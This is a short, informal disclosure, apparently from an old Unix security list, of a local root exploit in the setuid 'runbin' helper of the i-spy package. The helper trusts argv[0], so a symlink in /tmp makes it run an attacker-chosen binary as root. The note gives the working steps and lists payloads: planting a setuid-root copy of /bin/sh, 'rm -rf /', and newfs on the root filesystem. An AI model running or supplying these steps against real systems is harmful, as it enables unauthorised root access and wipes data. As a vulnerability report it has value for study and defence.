Install i-spy into /opt/ispy...

you get directories /opt/ispy/bin and /opt/ispy/realbin...

and /opt/ispy/runbin which is setuid root....hmmm runbin eh?

strings runbin shows that it calls execv()....hmmm even worse!

ln -s /opt/ispy/bin/runbin /tmp/djw/ls

/tmp/djw/ls
execv() of [/tmp/bin/realbin/ls] failed, errno 2

so it uses argv[0] to get the relative directory to use and is fooled by
links??


So running /tmp/djw/ls does an execv() of /tmp/bin/realbin/ls and runbin is
setuid root so...

cp `whence id` /tmp/bin/realbin/ls

/tmp/djw/ls
uid=...gid=...euid=0(root)...
^^^^^^^^^^

so making /tmp/bin/realbin/ls a C program which does

- cp /bin/sh /tmp/.hacked; chown root /tmp/.hacked; chmod 4775 /tmp/.hacked
gives a root shell!!
- rm -rf /
- newfs <rootfs>
etc etc etc...

Welcome to the sos zone..you've been hacked!!